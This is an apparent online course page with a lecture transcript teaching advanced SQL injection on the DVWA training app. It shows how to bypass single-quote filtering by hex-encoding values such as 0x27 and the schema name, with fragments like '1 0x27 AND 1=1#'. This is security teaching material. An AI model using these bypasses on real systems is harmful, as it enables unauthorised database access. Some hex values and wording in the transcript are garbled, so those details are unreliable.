Advanced SQL Injection
The course is part of this learning path
This course provides you with a deep dive into SQL Injections, covering some of the more advanced techniques. We're going to see what a blind injection is and look at the alternative tests that we can use to find SQL vulnerabilities. We're going to talk about hex representations, reading and writing files and we're also going to see how to hack into a server using a SQL Injection type of vulnerability.
Hi, within this lecture, we're going to see a little bit more advanced stuff about SQL injection. Now that we know in the medium security, the single quotation marks are the problems, right? So, if we omit them, it will work. We don't even need this uppercase, lowercase or plus things, plus characters to make it work. So, maybe we can try to encode this with %27 but I believe we have already tried that and it didn't work. So, when it sees a single quotation mark, it just breaks the code. But over here maybe we may want to filter out the stuff and in this case we have the single quotation mark issue, right? So, in the table, that table schema thing, we make it equal to 'dvwa' inside of single quotation marks. So, if we even omit the first single quotation mark with giving 1 and space and pasting the thing, it might work but it didn't. So, it didn't just block the first single quotation mark. If we have a single quotation mark in the whole command, it will break. So, maybe you may think that, "Yeah, just delete the single quotation marks and try it like that." But as you can see it doesn't see the 'dvwa' in that case. So, if you come across in a situation like this, maybe you can try to give single quotation marks but in a completely different form. So, we have already tried %27 which is URL encoding, maybe we can try something else and try again. So, as you can see if we don't include any single quotation marks then it works but if we include it then it doesn't work, maybe we will have to include it in future. So, we're going to have to know the advanced stuff for injection over there. So, let me try %27 rather than just giving the quotation marks. Again, it doesn't work. So, if URL encoding doesn't work then there is some sort of an issue over here. So, they are blocking it in every kind of encryption maybe. Okay, maybe we can just try to inject something over there but it doesn't work. It doesn't work as long as you have a single quotation mark and in this case we have to have a single quotation mark. So, what do we do? Let me come back here to encoding, okay? As you can see, %27 is the URL representation of this character. Maybe we can just represent it with different things like a Hex. So, I'm going to come over here and say Encode as and as you can see we can select the Hex but it didn't show up, maybe we can just do it like this with Hex. Yeah, here we go. Now we see the Hex value of this is 27 actually, like a %27. But we can write this in a Hex form, Hex code. So, how do we write it? Right now we know that it's 0, 27, in Hex representation. Then we can just try to inject this as a Hex. Now let's see how it's done. So, I'm going to just copy and paste this over there and write the single quotations in a Hex form and in any Hex form, you start with 0x and then write the Hex representation. So, in this case it's 0x27, okay? So, make sure you put it rather than single quotation mark. So, let's try it like that, okay? 0x27 and 1=1. So, if it works then everything else will work as well. So, I'm going to go back here, okay? Let's close this down, we're not using them. We couldn't find a good one and let's try it like this, 10x27 which is the single quotation mark AND 1=1#. And here we go. We have some sort of an issue but we don't even have a var clause over there, so let me close this down with # and let's see if we always get the same thing, let me just run it from scratch. Whatever we do it doesn't work, so maybe it won't let us have the single quotation mark whatever we do. So, maybe we can try something like this rather than running this, okay? Rather than running this with the single quotation marks, we're going to run it without the single quotation marks. We did it before but it didn't recognize dvwa, maybe if we change this dvwa into hex representation then it will understand that that's a string, that's a text and we're going to work our way up from there. So, let me write dvwa and turn it into Hex. And as you can see, it's 64, 75, 77, and 61. So, I'm going to use all of this stuff. Rather than saying dvwa, I'm going to start with 0x one more time and just write all the numbers that we have seen. Let's see what it was. So, 61, 77, 75, 64 so let's write 76, 77, 61. Yes, here we go. Now let's try this and see if that's working or not, okay? I'm going to give this com directly to the SQL injection website. I'm just going to copy all of this thing, and give it without any single quotation marks. So, let me copy or cut this and just paste it over here so we won't get confused later on. I'm not going to give any single quotation marks, I'm just going to give this, okay? Let me copy this and come over here, write 1 space and just paste it and let's try and see. Here we go. Let's submit and here we go. We have the guestbook, we have the users. Now it works, we found a way to make it work even though it's just filtering all the single quotation marks. So, there might be not any times that you will come across this and just try to use something that has been already filtered for you but if it comes, if that time comes for you, then you might consider the Hex representations as well. So, that's a good practice, okay? And this is advanced SQL injection stuff, but you're going to come across this kind of thing all the time. So far so good. Now, we're going to stop here and continue talking about this subject in the next lecture as well.
Atil is an instructor at Bogazici University, where he graduated back in 2010. He is also co-founder of Academy Club, which provides training, and Pera Games, which operates in the mobile gaming industry.